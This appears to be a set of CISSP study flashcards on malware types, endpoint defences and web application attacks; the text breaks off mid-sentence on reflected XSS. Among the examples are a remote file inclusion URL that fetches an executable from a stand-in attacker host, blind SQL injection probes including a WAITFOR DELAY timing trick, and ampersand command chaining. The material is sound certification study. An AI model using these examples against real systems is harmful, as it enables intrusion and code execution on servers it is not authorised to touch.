CISSP ch 21

Question 1

Virus functions

Answer 1

two main functions – propagation and payload execution

Question 2

MBR (virus)

Answer 2

master boot record virus

One of the earliest known forms of infection

Attack the MBR – the portion of bootable media (e.g., hard disk or flash drive) that the computer uses to load the operating system during the boot process

MBR is extremely small, usually 512 bytes, can’t contain all the code required to implement the virus’ propagation and destructive functions

To bypass space limitation, store the majority of their code on another portion of the storage media

When system reads the infected MBR, virus instructs it to read and execute the code stored in this alternate location

Most MBR viruses are spread between systems through the use of infected media inadvertently shared between users

If the infected media is in the drive during the boot process, the target system reads the infected MBR, and the virus loads into memory, infects the MBR on the target’s system’s hard drive

Question 3

Master boot record

Answer 3

not the boot sector

MBR is a single disk sector, normally the first sector of the media that is read in the initial stages of the boot process. MBR then determines which media partition contains the operating system and then directs the system to read that partition’s boot sector to load the operating system. Viruses can attack both the MBR and the boot sector, with similar results

Question 4

File infector virus

Answer 4

Viruses that infect different types of executable files and trigger when the operating system attempts to execute them

Windows-based systems, viruses affect executable files and scripts:

.exe

.com

.msc

Standard file infector viruses that do not use cloaking techniques such as stealth or encryption are often easily detected by comparing file characteristics (size, modification date) before and after infection or by comparing hash values

Question 5

Companion virus

Answer 5

Variation of the file infector virus

Self-contained executable files that escape detection by using a filename similar to, but slightly different from, a legitimate operating system file

Rely on the default file name extensions that Windows-based operating systems append to commands when executive program files (in this order)

.com

.exe

.bat

E.g., replacing game.exe with game.com – if you open a command prompt and simply type GAME, the operating system would execute the virus file (game.com) instead of game.exe

Question 6

VBA

Answer 6

visual basic for applications = programming language used by scripting functionalities

Question 7

Macro viruses

Answer 7

Leverages scripting functionality implemented in common software applications

E.g., Melissa Virus in 1999 and I Love You Virus in 2000 spread through Word Document that exploited a vulnerability in Outlook to replicate

Question 8

Service injection virus

Answer 8

Inject themselves into trusted runtime processes of the operating system, such as svchost.exe, winlogon.exe and explorer.exe

Bypasses detection by any antivirus software running on the host

Best protection: ensure that all software allowing the viewing of web content (browsers, media players, helper applications) receives current security patches

Question 9

Multipartite viruses

Answer 9

Use more than one propagation technique

E.g., virus might infect critical COM and EXE files by adding malicious code to each file (file infector virus), then write malicious code to the system’s master boot record (boot sector virus)

Question 10

stealth viruses

Answer 10

Hide themselves by actually tampering with the operating system to fool antivirus packages into thinking that everything is functioning normally

E.g., overwriting the system’s master boot record but then modifying the operating system’s file access functionality to cover its tracks

Question 11

polymortphic viruses

Answer 11

Modify their own code as they travel from system to system

Propagation and destruction techniques remain the same, but the signature of the virus is somewhat different each time it infects a new system

Current versions of anti-virus software are able to detect known polymorphic viruses

Question 12

encrypted viruses

Answer 12

Use cryptographic techniques to avoid detection

In their outward appearance, quite similar to polymorphic viruses, each infected system has a virus with a different signature

However, do not generate these modified signatures by changing their code, instead they alter the way they are stored on the disk

Use a very short segment of code, known as the virus decryption routine, which contains the cryptographic information necessary to lead and decrypt the main virus code stored elsewhere on the disk. Each infection utilizes a different cryptographic key, causing the main code to appear completely different on each system.

However, the virus decryption routines often contain telltale signatures that render them vulnerable to updated antivirus software packages

Question 13

trojan horses

Answer 13

software program that appears benevolent but carries a malicious, behind-the-scenes payload that has the potential to wreak havoc on a system or network

Question 14

RATs

Answer 14

Remote access Trojans = open backdoors in systems that grant the attacker remote administrative control of the infected systems

E.g., a RAT might open a Secure Shell (SSH) port on a system that allows the attacker to use a preconfigured account to access the system and then send a notice to the attacker that the system is ready and waiting for a connection

Question 15

cryptomalware

Answer 15

designed to steal computing power from infected systems for use in mining Bitcoin or other cryptocurrencies

Question 16

worms

Answer 16

contain same destructive potential as other malicious code objects with an added twist – they propagate themselves without requiring any human intervention

Question 17

PUPs

Answer 17

potentially unwanted programs = software that a user might consent to installing on their system that then carries out functions that the user did not desire or authorize

Question 18

Scripting technology

Answer 18

automate input of commands = also available to improve the efficiency of malicious actors = commonly found in a class of malware known as fileless malware

Question 19

Fileless malware

Answer 19

never write files to disk, making them more difficult to detect = e.g., link might exploit a browser vulnerability to execute code that downloads and runs a PowerShell script entirely in memory, where it triggers a malicious payload

Question 20

Antivirus responses to detection

Answer 20

If the software can eradicate the virus, it disinfects the affected files and restores the machine to a safe condition

If the software recognizes the virus but doesn’t know how to disinfect the files, it may quarantine the files until the user or an administrator can examine them manually

If security setting/policies do not provide for the quarantine or the files exceed a predefined danger threshold, the antivirus package may delete the infected files in an attempt to preserve system integrity

Question 21

File integrity monitoring tools

Answer 21

secondary anti-virus functionality = designed to alert administrator to unauthorized file modifications = maintain a database of hash values for al files stored on the system, archived hash values are then compared to current computed values to detect any files that were modified between two periods

Question 22

EDR

Answer 22

endpoint detection and response packages = go beyond traditional antimalware protection to help protect endpoints against attack = contain antimalware capabilities found in traditional antirvirus packages with advanced techniques designed to better detect threats and take steps to eradicate them, some specific capabilities include:

Analyzing endpoint memory, filesystem, and network activity for signs of malicious activity

Automatically isolating possible malicious activity to contain the potential damage

Integration with threat intelligence sources to obtain a real-time insight into malicious behavior elsewhere on the internet

Integration with other incident response mechanisms to automate response efforts

Question 23

MDR

Answer 23

managed detection and response services = where security vendors offer EDR capabilities and also provide installation, configuration, and monitoring services to reduce load on customer security teams

Question 24

UEBA

Answer 24

user and entity behavior analytics packages

pay particular attention to user-based activity on endpoints and other devices, building a profile of each individual’s normal activity and then highlighting deviations from that profile that may indicate a potential compromise

UEBA tools differ from EDR capabilities in that UEBA has an analytic focus on the user, whereas EDR has an analytic focus on the endpoint

Question 25

buffer overflow vulnerabilities

Answer 25

exist when a developer does not properly validate user input to ensure that is of an appropriate size, input that is too large can “overflow” a data structure to affect other data sored in the computer’s memory can corrupt other data stored in memory or at worst, be used to overwrite system commands, allowing attacker to execute targeted commands on the server

Question 26

buffer overflow defenses

Answer 26

The user can’t enter a value longer than the size of any buffer that will hold it The user can’t enter an invalid value for the variable types that will hold it The user can’t enter a value that will cause the program to operate outside its specific parameters

Question 27

CGI

Answer 27

Common Gateway Interface = language that allows unskilled programmers to quickly create interactive web pages = buffer overflow vulnerabilities are especially prevalent in code developed rapidly for the web using this language and other similar languages

Question 28

TOC and TOU

Answer 28

TOC = time of check = time at which the subject checks on the status of the object, there may be several decisions to make before returning to the object to access it TOU = time of use = when the decision is made to access the object

Question 29

TOCTTOU attacks / race conditiosn

Answer 29

when the difference between the TOC and the TOU is large enough for an attacker to replace the original object with another objects that suits their own needs, attacker is racing with the legitimate process to replace the object before it is used = example of a state attack (attack timing, data flow control and transition between on system state to another) E.g., replacing a data file after its identity has been verified but before data is read

Question 30

rootkits

Answer 30

common way that attackers wage privilege escalation attacks = freely available on the internet and exploit known vulnerabilities in various operating systems = root is the administrator level

Question 31

injection vulnerabilities

Answer 31

allows an attacker to supply some type of code to the web application as input and trick the web server into either executing that code or supplying it to another server to execute

Question 32

SQL injection attacks

Answer 32

attacker sends an unusual request to the web server, usually involving commands, including requests that execute commands that modify records, drop tables, or perform other actions that violate the integrity and/or availability of databases

Question 33

blind SQL injection

Answer 33

when some SQL injection flaws do not provide the attacker with a means to directly view the results of the attack

Question 34

blind content-based SQL injection attack

Answer 34

perpetrator sends input to the web application that tests whether the application is interpreting injected code before attempting to carry out an attack E.g. adding 1=2 and the end of the request to see if the web application is vulnerable (vulnerable if returns no results, means the web server looks past the end of the request) If vulnerable, attacker can then attempt more malicious queries that alter the contents of the database or perform other unwanted actions

Question 35

blind timing-based SQL injection attacks

Answer 35

using the amount of time required to process a query as a channel for retrieving information from a database Attacks depend on delay mechanisms provided by different database platforms. E.g., Microsoft SQL Server’s Transact-SQL allows a user to specify a command such as this: WAITFOR DELAY ’00:00:15’ This would instruct the database to wait 15 seconds before performing the next action. An application that immediately returns the results is probably not vulnerable to timing-based attacks Can be used to identify each character of a password, one by one, by instructing the database to wait a certain amount of time if the character is equal to the current letter Tools like SQLmap and Metasploit automate blind timing-based attacks

Question 36

Code injection attacks

Answer 36

general class of attacks that include SQL injection attacks = seek to insert attacker-written code into the legitimate code created by a web application developer

Question 37

LDAP injection attack

Answer 37

ttackers embed commands in text being sent as part of a Lightweight Directory Access Protocol (LDAP) query focus of the attack is on the back end of an LDAP directory service rather than a database server

Question 38

XML injection

Answer 38

where the back-end target is an XML application Commands may attempt to load dynamically linked libraries (DLL) containing malicious code in a DLL injection attack

Question 39

command injection attacks

Answer 39

where application code reaches back to the operating system to execute a command an attacker might exploit a flaw in the application and gain the ability to directly manipulate the operating system E.g., adding an ampersand (&) to indicate that the operating system should execute the text after the ampersand as a separate command, allowing attacker to execute commands (e.g., rm command, used to remove something) by exploiting an input field that is only intended to execute a mkdir command (create new directory command)

Question 40

Authorization vulnerabilities

Answer 40

allow an attacker to exceed the level of access that they are authorized

Question 41

OWASP

Answer 41

Open Web Application Security Project = a nonprofit security project focused on improving security for online or web-based applications = maintains a top 10 list of the most critical web application security risks and the top 10 proactive controls to protect against application security issues

Question 42

Insecure direct object reference

Answer 42

if the application does not perform authorization checks, the user may be permitted to view information that exceeds their authority by editing a query string or a POST request in the URL

Question 43

Directory traversal attacks

Answer 43

when web servers allow the inclusion of operators that navigate the directory paths and file system access controls don’t properly restrict access to files stored elsewhere on the server E.g., In Linux operating systems, the … operator in the file path refers to the directory one level higher than the current directory. Directory traversal attacks use this knowledge and attempt to navigate outside of the areas of the filesystem that are reserved for the web server

Question 44

file inclusion attacks

Answer 44

directory traversal attacks taken to the next level = instead of simply retrieving a file and displaying it, file inclusion attacks actually execute the code contained within a file, allowing the attacker to fool the web server into executing targeted code

Question 45

local file inclusion attacks

Answer 45

seek to execute code stored in a file located elsewhere on the web server E.g., a file that the attacker uploaded to a directory on a Windows server

Question 46

Remote file inclusion attacks

Answer 46

allow the attacker to execute code that is stored on a remote server Attacker can directly control the code being executed without having to first store a file on the local server E.g., http://www.mycompany.com/app.php?include=http://evil.attacker.com/attack.exe

Question 47

Web shells

Answer 47

allow the attacker to execute commands on the server and view the results in the browser = provides the attacker with access to the server over commonly used HTTP and HTTPS ports, making their traffic less vulnerable to detection by security tools, attacker may even repair the initial vulnerability they used to gain access to the server to prevent its discovery by another attacker seeking to take control of the server or by a security team

Question 48

XSS

Answer 48

cross-site scripting attacks = when web applications allow an attacker to perform HTML injection, inserting their own HTML code into a web page

Question 49

Reflected XSS

Answer 49

when an application allows reflected input, e.g., adding a script into the ‘name’ field of a form to ‘reflect’ the input Can be used to embed form input in a link. When a user visits the link, the web page is an authentic website, but executes the script included in the input by the malicious link creator When creating web applications that allow any type of user input, developers must be sure to perform input validation. Applications should never allows a user to include the